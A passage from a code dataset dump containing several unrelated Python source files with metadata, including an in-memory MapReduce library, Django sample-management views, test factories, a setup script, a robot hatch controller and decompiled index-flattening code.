face_name_list\r\n","sub_path":"identify_faces_from_video.py","file_name":"identify_faces_from_video.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"163117907","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys, os, mysql.connector\nfrom minuteaction import MinuteAction\nfrom houraction import HourAction\nfrom dayaction import DayAction\nfrom a7action import A7Action\n\ndef main(actionDbConfig, analyticsDbConfig):\n minuteAction = MinuteAction(actionDbConfig, analyticsDbConfig)\n minuteAction.setDaemon(True)\n minuteAction.start()\n\n hourAction = HourAction(analyticsDbConfig)\n hourAction.setDaemon(True)\n hourAction.start()\n\n dayAction = DayAction(analyticsDbConfig)\n dayAction.setDaemon(True)\n dayAction.start()\n\n a7Action = A7Action(analyticsDbConfig)\n a7Action.setDaemon(True)\n a7Action.start()\n\n # keep program doesn't exit\n count = 0\n while 1:\n count += 1\n\nif __name__ == '__main__':\n #\n # Configure MySQL login and database to use in config.py\n #\n from config import Config\n actionDbConfig = Config.getActionDbInfo().copy()\n analyticsDbConfig = Config.getAnalyticsDbInfo().copy()\n main(actionDbConfig, analyticsDbConfig)\n","sub_path":"Source/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"390573213","text":"\"\"\"In-memory MapReduce. Get weird.\n\nSee :obj:`MapReduce` for an example.\n\"\"\"\n\n\nimport abc\nimport builtins\nfrom collections import defaultdict\nfrom inspect import isgeneratorfunction\nimport itertools as it\nfrom functools import partial\nimport operator as op\n\n\n__all__ = [\"ElementCountError\", \"MapReduce\"]\n\n\n__version__ = \"1.0\"\n\n\nclass MapReduce(object):\n\n \"\"\"In-memory MapReduce framework.\n\n Subclass this base class and implement :meth:`mapper` and\n :meth:`reducer` methods to produce an object that can run a map reduce\n task.\n\n Output can be customized by overriding :meth:`output`, and sorting can\n be controlled via these properties: :attr:`sort_map_with_value`,\n :attr:`sort_map_reverse`, :attr:`sort_reduce_with_value`, and\n :attr:`sort_reduce_reverse`.\n\n Subclasses are also given complete control over :meth:`__init__`, and can\n implement a context manager by overloading :meth:`__enter__` and\n :meth:`__exit__`. The default implementation provides a :meth:`close`\n that can be overloaded to perform any teardown when exiting the context\n manager.\n\n See :meth:`__call__` for how to execute the :meth:`mapper` and/or the\n :meth:`reducer` concurrently.\n\n Example Word Count Task\n -----------------------\n\n This is not necessarily the fastest or best way to count words, but it\n is the easiest to read. The ``mapper()`` takes a line of text, split it\n into words, and emits tuples where the first element is the word and the\n second is a 1. The ``reducer()`` receives the word and a bunch of 1's, one\n for each instance of the word across all the input text. The\n ``reducer()`` counts the 1's and emits a tuple where the first element\n is the word and the second is a count of all instances of that word across\n the entire input text.\n\n .. code-block:: python\n\n from tinymr import MapReduce\n\n class WordCount(MapReduce):\n\n def mapper(self, item):\n line = item.lower()\n for word in line.split():\n yield word, 1\n\n def reducer(self, key, values):\n return word, sum(values)\n\n The task can be invoked like this:\n\n .. code-block:: python\n\n with WordCount() as mr, open('data.txt') as f:\n results = mr(f)\n\n The output of this task is a dictionary mapping keys to values (the default\n implementation) and would look something like:\n\n .. code-block:: json\n\n {\n \"word\": 345,\n \"the\": 4,\n \"another\": 71\n }\n\n See :meth:`mapper` and :meth:`reducer` for information about how to sort\n data and :meth:`output` for information about how to customize what the\n task returns.\n \"\"\"\n\n __metaclass__ = abc.ABCMeta\n\n @abc.abstractmethod\n def mapper(self, item):\n\n \"\"\"Map phase.\n\n Receives a single item from the input stream and produces one or\n more output ``tuple``s with 2 or 3 elements. The first element is\n always used for partitioning and the last is always passed to the\n ``reducer()``:\n\n .. code-block::\n\n (partition, value)\n\n but if the middle element is present then the data is sorted according\n to that value prior to being passed to ``reducer()``.\n\n .. code-block::\n\n (partition, sort, value)\n\n All elements emitted by the ``mapper()`` must be of the same length,\n however for performance reasons only the first is checked.\n\n This mapper looks for lines in a file containing the word\n ``fox`` and passes those lines to the ``reducer()`` in sorted order.\n\n .. code-block:: python\n\n def mapper(self, path):\n\n with open(path) as f:\n\n for idx, line in enumerate(f):\n if \"fox\" in line.lower().split():\n yield path, idx, line\n\n A ``mapper()`` can either ``return`` a single value or ``yield`` many.\n This ``mapper()`` just indicates if the word \"fox\" appears in a text\n file:\n\n .. code-block:: python\n\n import itertools as it\n\n def mapper(self, path):\n\n with open(path) in f:\n text = f.read()\n text = text.lower()\n words = set(text.split())\n\n contains_fox = \"fox\" in words\n return item, contains_fox\n\n and this ``mapper()`` does the same but by streaming the file and\n checking each line:\n\n .. code-block:: python\n\n def mapper(self, item):\n\n with open(item) as f:\n for line in f:\n if \"fox\" in line.lower().split():\n yield item, 1\n break\n\n Normally only the 2nd key enables sorting, but the value itself can\n be integrated into sorting with the :attr:`sort_map_with_value`\n attribute.\n\n If ``mapper()`` emits 3 elements and :attr:`sort_with_map_value` is\n enabled, then the results with be sorted based on the sort element AND\n the value element. Results can be sorted in reverse with\n :attr:`sort_map_reverse`, which can be configured similarly to\n :attr:`sort_map_with_value`.\n\n Parameters\n ----------\n item : object\n A single item from the input data stream.\n\n Returns\n -------\n A ``tuple`` containing 2 or 3 elements. Can also ``yield`` multiple\n ``tuple``s.\n \"\"\"\n\n @abc.abstractmethod\n def reducer(self, key, values):\n\n \"\"\"Reduce phase.\n\n Receives values corresponding to a single partition. May or may\n not be sorted depending on the ``mapper()`` implementation and\n :attr:`sort_map_with_value`.\n\n Outputs a ``tuple`` with 2 or 3 keys that are subjected to the same\n sorting rules as :meth:`mapper`.\n\n Like :meth:`mapper`, ``reducer()`` can ``return`` a single value or\n ``yield`` multiple. For :meth:`mapper` this has no impact aside from\n making some implementations easier, but for ``reducer()`` this impacts\n how the data is passed on to :meth:`output`. Using the word count\n example, this ``reducer()`` returns a single value:\n\n .. code-block:: python\n\n def reducer(self, key, values):\n return key, sum(values)\n\n whereas this ``reducer()`` yields a single value:\n\n .. code-block:: python\n\n def reducer(self, key, values):\n yield key, sum(values)\n\n The difference is that for the former :meth:`output` receives a\n dictionary that looks like:\n\n .. code-block:: json\n\n {\n \"word\": 345,\n \"the\": 4,\n \"another\": 71\n }\n\n however for the latter :meth:`output` receives this:\n\n .. code-block:: json\n\n {\n \"word\": [345],\n \"the\": [4],\n \"another\": [71]\n }\n\n The difference is that ``yield``ing values gives :meth:`output` a list\n of values for each key. A ``reducer()`` that ``return``s a single value\n only has an output key containing a single value, however one that\n ``yield``s multiple values produces an output key containing multiple\n values.\n\n Output from ``reducer()`` can be sorted similar to :meth:`mapper`\n before being passed to :meth:`output` based on the number of elements,\n :attr:`sort_reduce_with_value`, and :attr:`sort_reduce_reverse`.\n\n Parameters\n ----------\n key : object\n The partition key, which is the first element in the output from\n :meth:`mapper`.\n values : list\n List of all values emitted by :meth:`mapper`. May or may not be\n sorted. See :meth:`mapper` for information about sorting.\n\n Returns\n -------\n A ``tuple`` with 2 or 3 elements. Can also ``yield`` multiple\n ``tuple``s.\n \"\"\"\n\n def output(self, mapping):\n\n \"\"\"Catch and optionally modify task output before returning to caller.\n\n Parameters\n ----------\n mapping : dict\n A mapping between the first element produced by each\n :meth:`reducer` call and its corresponding values. See\n :meth:`reducer` for an explanation about when the dictionary values\n can be a ``list``.\n\n Returns\n -------\n Anything! The default implementation just passes on the input ``dict``\n unaltered.\n \"\"\"\n\n return mapping\n\n @property\n def sort_map_with_value(self):\n\n \"\"\"Include value/data when sorting output of the map phase.\n\n If :meth:`mapper`'s output does not include a sort element then this\n flag causes the sort phase to sort on the actual value. If\n :meth:`mapper`'s output does include a sort element then the sort phase\n sorts on that element and the actual value.\n\n Returns\n -------\n bool\n \"\"\"\n\n return False\n\n @property\n def sort_map_reverse(self):\n\n \"\"\"Sort output of map phase like ``sorted(..., reversed=True)``.\n\n Indicates if the output of :meth:`mapper` should be sorted\n descending instead of ascending. Ignored if not sorting. See\n :meth:`mapper` for more information.\n\n Returns\n -------\n bool\n \"\"\"\n\n return False\n\n @property\n def sort_reduce_with_value(self):\n\n \"\"\"Include data/value when sorting output of the reduce phase.\n\n Like :attr:`sort_map_with_value` but for the output of\n :meth:`reducer`. See :meth:`mapper` and :meth:`reducer` for\n more information.\n\n Returns\n -------\n bool\n \"\"\"\n\n return False\n\n @property\n def sort_reduce_reverse(self):\n\n \"\"\"Sort output of reduce phase like ``sorted(..., reverse=True)``.\n\n Like :attr:`sort_map_reverse` but for the output of :meth:`reducer`.\n See :meth:`mapper`, :meth:`reducer`, and :meth:`sort_map_reverse` for\n more information.\n\n Returns\n -------\n bool\n \"\"\"\n\n return False\n\n def close(self):\n\n \"\"\"Optionally tear down class.\n\n This class can be structured as a context manager. By default,\n :meth:`__exit__` calls this method, so context teardown can be\n achieved by overloading this method.\n \"\"\"\n\n def __enter__(self):\n\n \"\"\"Enter context.\n\n Default implementation does nothing.\n \"\"\"\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n\n \"\"\"Exit context.\n\n Default implementation calls :meth:`close`.\n \"\"\"\n\n self.close()\n\n def __partition_and_sort(\n self, sequence, sort_with_value, reverse):\n\n \"\"\"Partition and sort data after mapping but before reducing.\n\n Given the output from :meth:`mapper` or :meth:`reducer`, partition,\n sort if necessary, remove any data that was only used for sorting.\n\n Parameters\n ----------\n sequence : iterable\n Of ``tuple``s. Output from :meth:`mapper` or :meth:`reducer`.\n sort_with_value : bool\n Indicates if data should be sorted based on the value element in\n addition to any sort elements that may be present.\n reverse : bool\n Indicates if data should be sorted descending instead of ascending.\n\n Returns\n -------\n dict\n Where keys are partitions and values are ready to be passed to\n :meth:`reduce` or :meth:`output`. All extra sorting information\n has been removed.\n \"\"\"\n\n sequence = (s for s in sequence)\n first = next(sequence)\n sequence = it.chain([first], sequence)\n\n if len(first) not in (2, 3):\n raise ElementCountError(\n \"Expected data of size 2 or 3, not {}. Example: {}\".format(\n len(first), first))\n\n has_sort_element = len(first) == 3\n need_sort = has_sort_element or sort_with_value\n\n if has_sort_element:\n sequence = map(op.itemgetter(0, slice(1, 3)), sequence)\n\n if not need_sort:\n getval = None\n sortkey = None\n\n elif not has_sort_element and sort_with_value:\n def getval(x):\n return x\n sortkey = None\n\n else:\n getval = op.itemgetter(1)\n if sort_with_value:\n sortkey = None\n else:\n sortkey = op.itemgetter(0)\n\n partitioned = defaultdict(list)\n for ptn, vals in sequence:\n partitioned[ptn].append(vals)\n\n if need_sort:\n partitioned = {\n p: (\n v.sort(key=sortkey, reverse=reverse),\n list(map(getval, v))\n )[1]\n for p, v in partitioned.items()\n }\n\n return partitioned\n\n def __call__(self, sequence, map=None, mapper_map=None, reducer_map=None):\n\n \"\"\"Execute a map reduce task.\n\n Given a sequence of input data, execute the map reduce task in\n several phases:\n\n 1. Map (:meth:`mapper`).\n 2. Partition and optionally sort.\n 3. Reduce (:meth:`reducer()`).\n 4. Partition and optionally sort.\n 5. Construct output (:meth:`output`).\n\n Optionally the map and/or reduce phases can be executed concurrently\n by passing a parallelized ``map()`` function to ``mapper_map`` and\n ``reducer_map``. For example, this ``WordCount`` implementation\n runs each :meth:`mapper` in a separate thread but runs the reducer\n serially:\n\n .. code-block:: python\n\n from concurrent.futures import ThreadPoolExecutor\n\n class WordCount(MapReduce):\n\n def mapper(self, item):\n with open(item) as f:\n for line in f:\n for word in line.split():\n yield word, 1\n\n def reducer(self, key, values):\n return key, sum(values)\n\n with WordCount() as mr, ThreadPoolExecutor(4) as pool:\n\n paths = [\"file1.txt\", \"file2.txt\"]\n\n results = mr(paths, mapper_map=pool.map)\n\n Passing the same function to ``reducer_map`` would cause each\n :meth:`reducer` to be executed in its own thread.\n\n Parameters\n ----------\n sequence : sequence\n Input data. :meth:`mapper` is mapped across this similar to:\n ``map(self.mapper, sequence)``.\n map : callable\n A convenience parameter that sets both ``mapper_map`` and\n ``reducer_map``, although those parameters take precedence.\n mapper_map : callable\n Like above but ``mapper_map(self.mapper, sequence)``. Example\n above illustrates how to run the ``map`` phase across multiple\n threads.\n reducer_map : callable\n Like ``mapper_map`` but for the ``reducer`` phase.\n\n Returns\n -------\n object\n See :meth:`output`.\n \"\"\"\n\n # If 'mapper()' is a generator, and it will be executed in some job\n # pool, wrap it in a function that expands the returned generator\n # so that the pool can serialize results and send back. Be sure to\n # wrap properly to preserve any docstring present on the method.\n mapper = self.mapper\n if mapper_map is not None and isgeneratorfunction(self.mapper):\n mapper = partial(_wrap_mapper, mapper=self.mapper)\n\n # Same as 'mapper()' but for 'reducer()'.\n reducer = self.reducer\n if reducer_map is not None:\n reducer = partial(_wrap_reducer, reducer=self.reducer)\n\n # Run map phase. If 'mapper()' is a generator flatten everything to\n # a single sequence.\n mapper_map = mapper_map or builtins.map\n mapped = mapper_map(mapper, sequence)\n if isgeneratorfunction(self.mapper):\n mapped = it.chain.from_iterable(mapped)\n\n # Partition and sort (if necessary).\n partitioned = self.__partition_and_sort(\n mapped,\n sort_with_value=self.sort_map_with_value,\n reverse=self.sort_map_reverse)\n\n # Run reducer. Be sure not to hold on to a pointer to the partitioned\n # dictionary. Instead, replace it with a pointer to a generator.\n reducer_map = reducer_map or it.starmap\n partitioned = partitioned.items()\n reduced = reducer_map(reducer, partitioned)\n\n # If reducer is a generator expand to a single sequence.\n if isgeneratorfunction(self.reducer):\n reduced = it.chain.from_iterable(reduced)\n\n # Partition and sort (if necessary).\n partitioned = self.__partition_and_sort(\n reduced,\n sort_with_value=self.sort_reduce_with_value,\n reverse=self.sort_reduce_reverse)\n\n # The reducer can yield several values, or it can return a single\n # value. When the operating under the latter condition extract that\n # value and pass that on as the single output value.\n if not isgeneratorfunction(self.reducer):\n partitioned = {k: next(iter(v)) for k, v in partitioned.items()}\n\n # Be sure not to pass a 'defaultdict()' as output.\n return self.output(dict(partitioned))\n\n\ndef _wrap_mapper(item, mapper):\n\n \"\"\"Use when running concurrently to normalize mapper output.\n\n Expands generator produced by :meth:`MapReduce.mapper` so that results can\n be serialized and returned by a worker.\n\n Parameters\n ----------\n item : object\n See :meth:`MapReduce.mapper`.\n mapper : callable\n A :meth:`MapReduce.mapper`.\n\n Returns\n -------\n tuple\n \"\"\"\n\n return tuple(mapper(item))\n\n\ndef _wrap_reducer(key_values, reducer):\n\n \"\"\"Like :func:`_wrap_mapper` but for :meth:`MapReduce.reducer`.\n\n Parameters\n ----------\n key_values : tuple\n Arguments for :meth:`MapReduce.reducer`. First element is the key and\n second is values.\n reducer : callable\n A :meth:`MapReduce.reducer`.\n \"\"\"\n\n return tuple(reducer(*key_values))\n\n\nclass ElementCountError(Exception):\n\n \"\"\"Raise when the actual element count does not match expectations.\"\"\"\n","sub_path":"tinymr.py","file_name":"tinymr.py","file_ext":"py","file_size_in_byte":18593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"394726817","text":"from django.http import JsonResponse\nfrom django.conf import settings\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.decorators import login_required\n\nfrom .models import NucleicAcidType, SampleProtocol, Sample, FileSample\nfrom .forms import SampleForm\n\nimport logging\nimport json\n\nlogger = logging.getLogger('db')\n\n\ndef get_nucleic_acid_types(request):\n \"\"\" Get the list of all nucleic acid types. \"\"\"\n data = [\n {\n 'id': nat.id,\n 'name': nat.name,\n 'type': nat.type,\n }\n for nat in NucleicAcidType.objects.all()\n ]\n return JsonResponse(data, safe=False)\n\n\ndef get_sample_protocols(request):\n \"\"\" Get the list of all sample protocols. \"\"\"\n data = []\n\n if request.method == 'GET':\n sample_type = request.GET.get('type', '')\n sample_protocols = SampleProtocol.objects.filter(type=sample_type)\n\n data = [\n {\n 'id': protocol.id,\n 'name': protocol.name,\n 'type': protocol.type,\n 'provider': protocol.provider,\n 'catalog': protocol.catalog,\n 'explanation': protocol.explanation,\n 'inputRequirements': protocol.input_requirements,\n 'typicalApplication': protocol.typical_application,\n 'comments': protocol.comments,\n }\n for protocol in sample_protocols\n ]\n\n return JsonResponse(data, safe=False)\n\n\n@login_required\ndef save_sample(request):\n \"\"\" Add a new sample or update an existing one. \"\"\"\n error = ''\n form = None\n data = []\n\n if request.method == 'POST':\n mode = request.POST.get('mode')\n sample_id = request.POST.get('sample_id', '')\n files = json.loads(request.POST.get('files', '[]'))\n\n if mode == 'add':\n form = SampleForm(request.POST)\n elif mode == 'edit':\n try:\n smpl = Sample.objects.get(pk=sample_id)\n form = SampleForm(request.POST, instance=smpl)\n except (ValueError, Sample.DoesNotExist) as e:\n form = None\n error = str(e)\n logger.exception(e)\n else:\n form = None\n\n if form:\n if form.is_valid():\n smpl = form.save()\n\n if mode == 'add':\n smpl.files.add(*files)\n data = {\n 'name': smpl.name,\n 'recordType': 'S',\n 'sampleId': smpl.id,\n 'barcode': smpl.barcode,\n }\n\n elif mode == 'edit':\n if files:\n old_files = [file for file in smpl.files.all()]\n smpl.files.clear()\n smpl.save()\n smpl.files.add(*files)\n new_files = [file for file in smpl.files.all()]\n\n # Delete files\n files_to_delete = list(set(old_files) - set(new_files))\n for file in files_to_delete:\n file.delete()\n else:\n error = str(form.errors)\n logger.debug(form.errors)\n else:\n error = error if error else 'Wrong or missing mode.'\n else:\n error = 'Wrong HTTP method.'\n\n return JsonResponse({'success': not error, 'error': error, 'data': data})\n\n\n@login_required\ndef delete_sample(request):\n \"\"\" Delete sample with a given id. \"\"\"\n error = ''\n\n if request.method == 'POST':\n record_id = request.POST.get('record_id', '')\n try:\n sample = Sample.objects.get(pk=record_id)\n sample.delete()\n except (ValueError, Sample.DoesNotExist) as e:\n error = str(e)\n logger.exception(e)\n else:\n error = 'Wrong HTTP method.'\n\n return JsonResponse({'success': not error, 'error': error})\n\n\n@csrf_exempt\n@login_required\ndef upload_files(request):\n \"\"\" \"\"\"\n error = ''\n file_ids = []\n\n if any(request.FILES):\n for file in request.FILES.getlist('files'):\n f = FileSample(name=file.name, file=file)\n f.save()\n file_ids.append(f.pk)\n\n return JsonResponse({\n 'success': not error,\n 'error': error,\n 'fileIds': file_ids,\n })\n\n\n@login_required\ndef get_files(request):\n \"\"\" \"\"\"\n error = ''\n data = []\n\n file_ids = request.GET.get('file_ids')\n\n if file_ids:\n file_ids = json.loads(file_ids)\n\n files = [f for f in FileSample.objects.all() if f.pk in file_ids]\n data = [\n {\n 'id': file.id,\n 'name': file.name,\n 'size': file.file.size,\n 'path': settings.MEDIA_URL + file.file.name,\n }\n for file in files\n ]\n\n return JsonResponse({'success': not error, 'error': error, 'data': data})\n","sub_path":"sample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16408797","text":"import factory\nfrom .models import Channel, Entity\n\n\nclass EntityFactory(factory.DjangoModelFactory):\n\n class Meta:\n model = Entity\n django_get_or_create = ('name', )\n\n name = \"EPFL\"\n\n\nclass ChannelFactory(factory.DjangoModelFactory):\n\n class Meta:\n model = Channel\n django_get_or_create = (\n 'name',\n 'fr_description',\n 'en_description',\n 'fr_source',\n 'en_source',\n 'entity',\n )\n\n name = 'idevelop'\n fr_description = 'Un canal avec pleins de news technologiques'\n en_description = 'Channel with lots of technologies news'\n fr_source = 'idevelop'\n en_source = 'idevelop'\n entity = factory.SubFactory(EntityFactory)\n\n @factory.post_generation\n def projects(self, create, extracted, **kwargs):\n if not create:\n # Simple build, do nothing.\n return\n\n if extracted:\n # A list of groups were passed in, use them\n for project in extracted:\n self.projects.add(project)\n","sub_path":"src/channel/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"31570053","text":"__author__ = 'Rex'\n\nSOURCE_LOCAL = 'local rpc'\nSOURCE_BLOCKCHAIN_INFO = 'blockchain.info'\nSOURCE_BLOCKEXPLORER_COM = \"blockexplorer.com\"\n\nTEST = True\nTEST_NET = True\nDEFAULT_SOURCE = SOURCE_LOCAL\n\nUSE_FAKE_DATA = False\nIGNORE_SEND_FROM_LOCAL = False\n\nif USE_FAKE_DATA:\n from types import Block, Transaction\n from datetime import datetime, timedelta\n\n now = datetime.now()\n delta = timedelta(seconds=600)\n\n blocks = [\n Block(\n height=1,\n hash='1',\n previous_hash='0',\n transactions=[], # test empty\n timestamp=now,\n ),\n Block(\n height=2,\n hash='2',\n previous_hash='1',\n transactions=[\n #openexchange change state to running\n Transaction(['xch_open_exchange'], [(1, 'xch_state_control', 1)], 'hash1'),\n #create asset ASICMINER\n Transaction(['xch_open_exchange'], [(1, 'xch_create_asset', 1)], 'hash2'),\n #change ASICMINER's running state to running\n Transaction(['xch_open_exchange'], [(1, 'asm_state_control', 1)], 'hash3'),\n ],\n timestamp=now+delta\n ),\n Block(\n height=3,\n hash='3',\n previous_hash='2',\n transactions=[\n #captain miao: limit sell 0.1*9999\n Transaction(['captain_miao'], [(1, 'asm_limit_sell', 10009999)], 'hash4'),\n ],\n timestamp=now+delta*2\n ),\n Block(\n height=4,\n hash='4',\n previous_hash='3',\n transactions=[\n #captain miao: limit sell 0.09*99\n Transaction(['captain_miao'], [(1, 'asm_limit_sell', 9000099)], 'hash4'),\n #rex: market buy 1BTC\n Transaction(['rex'], [(1, 'asm_market_buy', 1000000000)], 'hash5'),\n ],\n timestamp=now+delta*3\n )\n ]\n\n FAKE_DATA_GET_BLOCK_COUNT = len(blocks) # exchange start height = 0 when debug\n FAKE_DATA_GET_BLOCK_BY_HASH = {str(i+1):blocks[i] for i in xrange(len(blocks))}\n FAKE_DATA_GET_BLOCK_BY_HEIGHT = {i+1:blocks[i] for i in xrange(len(blocks))}\n","sub_path":"src/pybit/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"295299331","text":"'''\nAuthor: 龙嘉伟\nDate: 2021-06-28 19:10:40\nLastEditors: 龙嘉伟\nLastEditTime: 2021-07-01 10:13:24\nDescription: \n'''\n#! -*- coding: utf-8 -*-\nimport os\nimport shutil\nimport sys\n\nfrom pkg_resources import DistributionNotFound, get_distribution\nfrom setuptools import find_packages, setup\n\nstdout = sys.stdout\nstderr = sys.stderr\n\nlog_file = open('setup.log', 'w')\nsys.stdout = log_file\nsys.stderr = log_file\n\nwith open('README.md', 'r', encoding = 'utf8') as fh:\n long_description = fh.read()\n\nsetup(\n name='cutcut',\n version='0.0.1',\n description='General tokenizer',\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license='MIT',\n url='https://github.com/ljv006/cutcut',\n author='ljv006',\n author_email='longjw6@qq.com',\n # include_package_data = True,\n classifiers = [\n 'Development Status :: 3 - Alpha',\n\n # Indicate who your project is intended for\n 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n\n # Pick your license as you wish (should match \"license\" above)\n 'License :: OSI Approved :: MIT License',\n\n # Specify the Python versions you support here. In particular, ensure\n # that you indicate whether you support Python 2, Python 3 or both.\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n packages=['cutcut'],\n package_dir = {'cutcut':'cutcut'},\n install_requires=['bert-for-tf2','tensorflow>=2.0.0'],\n package_data= {\"cutcut\":[\"*.*\", \"data/*.txt\", 'savedModel/variables/*', 'savedModel/saved_model.pb']},\n python_requires='>=3.6',\n)\nlog_file.close()\n\nsys.stdout = stdout\nsys.stderr = stderr\n\nwith open('setup.log', 'r') as log_file:\n sys.stdout.write(log_file.read())\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"141684718","text":"import math\n\nimport wpilib\n\nfrom pyswervedrive.chassis import SwerveChassis\n\n\nclass Hatch:\n\n chassis: SwerveChassis\n\n hatch_bottom_puncher: wpilib.Solenoid\n hatch_left_puncher: wpilib.Solenoid\n hatch_right_puncher: wpilib.Solenoid\n hatch_wedge_piston: wpilib.DoubleSolenoid\n\n left_limit_switch: wpilib.DigitalInput\n right_limit_switch: wpilib.DigitalInput\n\n def setup(self):\n self.has_hatch = False\n\n def on_enable(self):\n self._punch_on = False\n self.hatch_wedge_piston.set(wpilib.DoubleSolenoid.Value.kForward)\n self.clear_to_retract = False\n self.fired_position = 0, 0\n self.loop_counter = 0\n\n def execute(self):\n \"\"\"Run at the end of every control loop iteration.\"\"\"\n delay = -1\n self.hatch_bottom_puncher.set(self._punch_on)\n self.hatch_left_puncher.set(self._punch_on and self.loop_counter > delay)\n self.hatch_right_puncher.set(self._punch_on and self.loop_counter > delay)\n if self._punch_on and self.loop_counter > delay:\n self.has_hatch = False\n self.loop_counter += 1\n if self.is_contained() and self.clear_to_retract:\n self.has_hatch = True\n if self.clear_to_retract:\n self._retract()\n if (\n math.hypot(\n self.fired_position[0] - self.chassis.odometry_x,\n self.fired_position[1] - self.chassis.odometry_y,\n )\n > 0.5\n ):\n self.clear_to_retract = True\n\n def punch(self):\n self.loop_counter = 0\n self._punch_on = True\n self.clear_to_retract = False\n self.fired_position = self.chassis.position\n\n def _retract(self):\n self._punch_on = False\n self.clear_to_retract = False\n\n def is_contained(self):\n return any(\n [not self.left_limit_switch.get(), not self.right_limit_switch.get()]\n )\n","sub_path":"components/hatch.py","file_name":"hatch.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"439114880","text":"import sys\n\n\ndef execute(arr, N):\n Len = []\n for item in arr:\n Set = set(item)\n Len.append(len(Set))\n return len(set(Len))\n\n\nInput = []\nfor line in sys.stdin:\n if line.strip() == '':\n break\n Input.append(line)\n\nN = int(Input[0])\nbegin = 1\narr = []\nfor i in range(0, N):\n s = Input[begin]\n arr.append(s)\n begin += 1\n\nprint(execute(arr, N))\n","sub_path":"Code/CodeRecords/2908/60772/252601.py","file_name":"252601.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"127341486","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\packages\\fsd\\schemas\\nestedIndexedOffsetData.py\nimport logging\nlog = logging.getLogger(__name__)\nimport time\nimport itertools\n\nclass NestedKeyDuplicationError(Exception):\n\n def __init__(self, indexedDuplicateData):\n self.indexedDuplicateData = indexedDuplicateData\n\n def __str__(self):\n message = ''\n for nestedIndexId, duplicateData in self.indexedDuplicateData.iteritems():\n message += 'Duplicate keys found for index %d:\\n' % nestedIndexId\n for key, duplicates in duplicateData.iteritems():\n message += '%s - defined in %s\\n' % (str(key), [ x for x in duplicates ])\n\n return message[:-1]\n\n\nclass IndexedOffsetData(object):\n\n def __init__(self, offset=0):\n self.offset = offset\n self.offsetData = {}\n self.nestedIndexedOffsetDataList = []\n\n def AddOffset(self, additionalOffset):\n self.offset += additionalOffset\n\n def AddKeyOffsetSizeAndPathToNestedIndexId(self, dataKey, offset, size, path, nestedIndexId):\n if nestedIndexId not in self.offsetData:\n self.offsetData[nestedIndexId] = []\n indexedOffsetData = self.offsetData[nestedIndexId]\n indexedOffsetData.append(_GenerateTupleForOffsetData(dataKey, offset, size, path))\n\n def Flatten(self):\n log.info('Starting to flatten')\n startTime = time.time()\n flattenedData = _FlattenOffsetData(self)\n t = time.time()\n for nestedIndexId, flattenedDataset in flattenedData.iteritems():\n flattenedData[nestedIndexId] = sorted(flattenedDataset, key=lambda x: x[0])\n\n log.info('Sorting flattened dict took: %.10f s' % (time.time() - t))\n t = time.time()\n indexedDuplicateData = _GetDuplicateData(flattenedData)\n if len(indexedDuplicateData) > 0:\n raise NestedKeyDuplicationError(indexedDuplicateData)\n log.info('Sorting and checking for duplicates took %.10f' % float(time.time() - t))\n log.info('Flattening, sorting and checking for duplicates took : %f s' % (time.time() - startTime))\n return flattenedData\n\n def AddNestedIndexedOffsetData(self, nestedIndexedOffsetData):\n self.nestedIndexedOffsetDataList.append(nestedIndexedOffsetData)\n\n def isEmpty(self):\n return len(self.offsetData) == 0 and len(self.nestedIndexedOffsetDataList) == 0\n\n\ndef _GenerateTupleForOffsetData(dataKey, offset, size, path):\n return (\n dataKey, offset, size, path)\n\n\ndef _GetKeyFromOffsetData(offsetDataTuple):\n return offsetDataTuple[0]\n\n\ndef _GetPathFromOffsetData(offsetDataTuple):\n return offsetDataTuple[3]\n\n\ndef _AddDataWithAddedOffsetToFlattenedDict(data, additionalOffset, flattenedDataDict):\n for nestedIndexId, offsetData in data.iteritems():\n if nestedIndexId not in flattenedDataDict:\n flattenedDataDict[nestedIndexId] = []\n for key, offset, size, path in offsetData:\n updatedOffsetData = _GenerateTupleForOffsetData(key, offset + additionalOffset, size, path)\n flattenedDataDict[nestedIndexId].append(updatedOffsetData)\n\n\ndef _AddOffsetToNestedIndexedDataList(nestedIndexedOffsetDataList, offset):\n for nestedIndexedOffsetData in nestedIndexedOffsetDataList:\n nestedIndexedOffsetData.AddOffset(offset)\n\n\ndef _FindDuplicateKeysWithPathInList(dataGroupedByKeys):\n duplicateKeysWithPath = {}\n for k, v in dataGroupedByKeys:\n l = list(v)\n if len(l) > 1:\n duplicateKeysWithPath[k] = [ _GetPathFromOffsetData(offsetData) for offsetData in l ]\n\n return duplicateKeysWithPath\n\n\ndef _GetDuplicateData(flattenedData):\n indexedDuplicateData = {}\n for nestedIndexId, indexedFlattenedData in flattenedData.iteritems():\n d = 